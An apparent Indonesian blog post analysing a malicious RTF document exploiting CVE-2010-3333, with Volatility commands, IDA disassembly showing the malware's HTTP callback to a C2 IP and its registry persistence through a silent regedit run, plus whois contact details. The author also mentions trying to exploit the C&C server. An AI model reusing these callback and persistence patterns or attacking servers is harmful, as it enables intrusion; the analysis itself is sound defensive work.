Reversing Malicious Document – A Quick Intro

nge-blog lagi..nulis lagi.mudah-mudahan bisa nulis seterusnya..berbagi dengan yang lain..

Berselancar dinternet memang mengasikkan,baca berita,baca email,chating,pacaran di facebook ( pengalaman pribadi ).Ketika asyik berselancar,gk sengaja buka blognya Milla.diblog itu dituliskan tentang sebuah document yang ia peroleh.tanpa basa basi langsung download file documennya..ternyata dipassword.huuuu…so kirim email ke Milla nanyain password buat file zip yang diprotek..beres..

FileName : China’s Military Build-up in the Early Twenty-first Century
MD5 : 02B77C3941478A05F2EE6559E3B76FB6
SHA1 : cd7a8327dc8917d90bdbe693a310fa75a43a1ae0
File size : 214503 bytes
type : Doc / RTF

quick analisys menggunakan OfficeMalScanner,tidak ditemukan signature tentang malicious document..
Setelah dibuka pake hexeditor,ternyata file tersebut adalah file RTF.
Menurut Investigasi dari Virus Total,kebanyakan antivirus mengidentifikasi sebagai Malicious cve-2010-3333 Document

Bug ini memanfaatkan celah Stack Based Overflow yang ada pada Microsoft Word ketika melakukan parsing Dokumen RTF.

Oke..Langsung saya buka dokument dengan MS Office 2007 pada OS WinXP sp3.
Ketika Dibuka,MS Office mengalami Crash,tapi payload yang ada pada file tersebut membuat 2 buah file pada direktory %TMP% ( C:\Documents and Settings\nama_user\Local Settings,namanya berbeda alias random dan extensinya .*tmp.
Setelah itu payload akan memanggil svchost.exe untuk menjalankan salah satu file yang diciptakan.tidak hanya membuat file,payload itu juga melakukan modifikasi terhadap registry windows agar malware yang sudah diciptakan bisa bereaksi ketika komputer dihidupkan.

Investigasipun berlanjut ke 2 file yang diciptkan.setelah diperika,ternyata kedua file itu adalah aplikasi deskripsi Adobe? Flash? Player Installer/Uninstaller 10.1 r53.Tampaknnya Aplikasi ini sudah dipacking sehingga agak sulit untuk di analisys..
butuh waktu untuk melakukan unpacking terhadap binary.

So,ane lanjut melakukan analisa terhadap file svchost.exe.Jika dilihat menggunakan proces hacker,file svchost.exe tersebut adalah file original windows.so salah satu teknik computer forensic ( memory forensic) harus digunakan..
Analisa proses yang running pada mesin yang terinfeksi menggunakan volatility :

python vol.py –profile=WinXPSP3x86 pslist -f /Volumes/private/virtual/win/Windows\ XP-reserac.pvm/\{9da05e15-7f94-49f0-bd90-a7cd00d7e146\}.mem

…..

prl_tools.exe 408 280 7 87 2011-03-18 09:08:44
svchost.exe 908 708 9 146 2011-03-18 09:08:47
mcrdsvc.exe 1376 708 5 122 2011-03-18 09:08:48
dllhost.exe 1712 708 13 185 2011-03-18 09:08:49
ehmsas.exe 2212 876 3 81 2011-03-18 09:08:49
alg.exe 2320 708 6 105 2011-03-18 09:08:50
wscntfy.exe 2680 1060 1 37 2011-03-18 09:08:51
wuauclt.exe 1284 1060 4 143 2011-03-18 09:12:13
ctfmon.exe 2624 2556 1 71 2011-03-18 09:12:43
svchost.exe 1636 3108 3 128 2011-03-18 09:19:53

dari list diatas proses ada beberapa process yang menggunakan svchost.exe.analisa berlanjut dengan menginvestigasi svchost.exe dengan pid 1636.
kemudia binary dengan PID 1636 didump untuk memudahkan analisa

python vol.py –profile=WinXPSP3x86 procexedump -f /Volumes/private/virtual/win/Windows\ XP-reserac.pvm/\{9da05e15-7f94-49f0-bd90-a7cd00d7e146\}.mem -p 1636 -D dump/
Dumping svchost.exe, pid: 1636 output: executable.1636.exe

file executable.1636.exe di analisa dengan IDA pro .
beberapa hasil disassembly dari IDA Pro :

……..
lea eax, [ebp+var_1A08]
lea ecx, [ebp+var_10]
mov [ebp+var_4], eax
call ??0CString@@QAE@XZ ; CString::CString(void)
mov eax, dword_404114
and [ebp+var_14], 0
imul eax, 3E8h
mov [ebp+dwMilliseconds], eax
call esi ; rand
push 1Ah
pop ebx
cdq
mov ecx, ebx
push 61h
idiv ecx
pop edi
add edx, edi
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
add edx, edi
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
add edx, edi
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
add edx, edi
push edx
call esi ; rand
cdq
idiv ebx
add edx, edi
push edx
push offset aCCCCC ; “%c%c%c%c%c”
push offset dword_404388
call ?Format@CString@@QAAXPBDZZ ; CString::Format(char const *,…)
add esp, 1Ch
mov ebx, offset Str ; “61.7.158.11”
……………….

push ebx
mov ecx, offset dword_4043A0
call ??4CString@@QAEABV0@PBD@Z ; CString::operator=(char const *)
mov eax, [edi]
push dword_404394
mov dword_40439C, eax
call esi ; rand
cdq
mov ecx, 0F4240h
idiv ecx
lea eax, [ebp+var_10]
push edx
push dword_404388
push dword_40439C
push dword_4043A0
push offset aHttpSDS_php?id ; “http://%s:%d/%s.php?id=%06d%s”
push eax
call ?Format@CString@@QAAXPBDZZ ; CString::Format(char const *,…)
add esp, 1Ch
……

dan

mov eax, offset loc_4029AC
call __EH_prolog
sub esp, 18h
push ebx
push esi
push edi
mov al, byte_40438C
xor edi, edi
mov cl, al
push edi
neg cl
sbb ecx, ecx
push edi
and ecx, dword_404390
mov [ebp+var_4], edi
neg al
sbb eax, eax
push ecx
and eax, 3
push eax
push offset aMozilla4_0Comp ; “Mozilla/4.0 (compatible; MSIE 6.0; Wind”…
call ds:InternetOpenA
mov ebx, eax
cmp ebx, edi
mov [ebp+var_18], ebx
jnz short loc_401F80

loc_401F80:
push edi
push 84400100h
push edi
push edi
push [ebp+arg_0]
push ebx
call ds:InternetOpenUrlA
mov esi, eax
cmp esi, edi
mov [ebp+var_14], esi

mmmmm..dari hasil diatas,bisa dipastikan aplikasi ini mencoba melakukan komunikasi ke ip
61.7.158.11 dengan memanfaatkan API InternetOpenUrlA.bagian http://%s:%d/%s.php?id=%06d%s menunjukan koneksi yang dibangun adalah koneksi HTTP atau HTTPS.so http://%s:%d/%s.php?id=%06d%s” = http://61.7.158.11:80/string.php?id=variable atau http://61.7.158.11:443/string.php?id=variable

pada fungsi yang lain,malware ini juga membuat sebuah file registry dengan nama ~dfds3.reg pada direktory C:\Documents and Settings\nama_user\Local Settings kemudian memanggil regedit.exeuntuk mengeksekusi file tersebut.hasilnya,malware menambahkan dirinya pada registry dengan harapan malware ini jalan ketika komputer dihidupkan.Setelah itu file yang di eksekusi,filf ~dfds3.reg langsung dihapus.tapi sayangnya,file ~dfds3.reg tidak berisi konfigurasi apa2.ini bisa dilihat dari list dibawah ini :

lea eax, [ebp+var_314]
push eax
lea eax, [ebp+String]
push [ebp+arg_4]
push [ebp+arg_0]
push offset aWindowsRegistr ; “Windows Registry Editor Version 5.00\r\n\r”…
push eax ; LPSTR
call ds:wsprintfA
add esp, 14h
lea eax, [ebp+FileName]
push 104h ; nSize
push eax ; lpDst
push offset Src ; “%tmp%\\”
call ds:ExpandEnvironmentStringsA
mov edi, ds:lstrcatA
lea eax, [ebp+FileName]
push offset String2 ; “~dfds3.reg”
push eax ; lpString1
call edi ; lstrcatA
……….
push eax ; lpBuffer
push [ebp+hFile] ; hFile
call ds:WriteFile
push [ebp+hFile] ; hObject
call ds:CloseHandle
lea eax, [ebp+CmdLine]
push offset aRegedit_exeS ; “regedit.exe /s ”
push eax ; lpString1
call ds:lstrcpyA
lea eax, [ebp+FileName]
push eax ; lpString2
lea eax, [ebp+CmdLine]
push eax ; lpString1
call edi ; lstrcatA
lea eax, [ebp+CmdLine]
push 5 ; uCmdShow
push eax ; lpCmdLine
call ds:WinExec
push 3E8h ; dwMilliseconds
call ds:Sleep
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:DeleteFileA
……

hasil lain menggunakan Immunity debugger dengan BlackManta plugin :

immunity debugger

kesimpulannya :
1.ketika file Document dibuka,file tersebut melakukan exploitasi terhadap MS WOrd
2.payloadnya dieksekusi dengan membuat 2 file pada system windows
3.malware melakukan modifikasi registry untuk mengaktifkan diri ketika komputer dinyalakan
4.malware berusaha connect ke ip http://61.7.158.11:443
/ihrea.php?id=xxxxxx

hasil trace IP tersebut:

inetnum: 61.7.128.0 – 61.7.191.255
netname: CAT-BB-NET
descr: 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok Thailand
country: TH
admin-c: TU16-AP
tech-c: VA48-AP
tech-c: PS474-AP
tech-c: WP273-AP
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-TH-THIX-CAT
changed: suchok@cat.net.th 20080926
source: APNIC

person: Theerachai Udomkitpanya
nic-hdl: TU16-AP
e-mail: utheera@thaipak.cat.net.th
address: 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok
phone: +66-261-42918
fax-no: +66-261-42682
country: TH
changed: suchok@bulbul.cat.net.th 20070719
mnt-by: MAINT-NEW
source: APNIC

person: Vittaya Areekul
nic-hdl: VA48-AP
e-mail: avittaya@cat.net.th
address: 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok
phone: +66-261-42138
fax-no: +66-261-42682
country: TH
changed: suchok@bulbul.cat.net.th 20070719
mnt-by: MAINT-NEW
source: APNIC

person: Passakorn Senaliang
nic-hdl: PS474-AP
e-mail: pass2000@cat.net.th
address: CAT-BB-NET
address: 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok Thailand
phone: +66-261-42138
fax-no: +66-261-42682
country: TH
changed: suchok@bulbul.cat.net.th 20080925
mnt-by: MAINT-NEW
source: APNIC

person: Weerapong Pankaew
nic-hdl: WP273-AP
e-mail: pankaew@cat.net.th
address: CAT-BB-NET
address: 10 Fl. 72. CAT TELECOM TOWER Bangrak Bangkok Thailand
phone: +66-261-42138
fax-no: +66-261-42682
country: TH
changed: suchok@bulbul.cat.net.th 20080925
mnt-by: MAINT-NEW
source: APNIC

5.kemungkinan besar malware ini adalah jenis botnet

setelah menganalisa binary malware,ane coba melakukan exploitasi terhadap Server C & C malware tersebut..tapi sayangnya,Servernya Down…mungkin lain kali aja ya..heheheheeh..

Posted on March 19, 2011, in Hacking & security, malware and tagged , , , , , , . Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: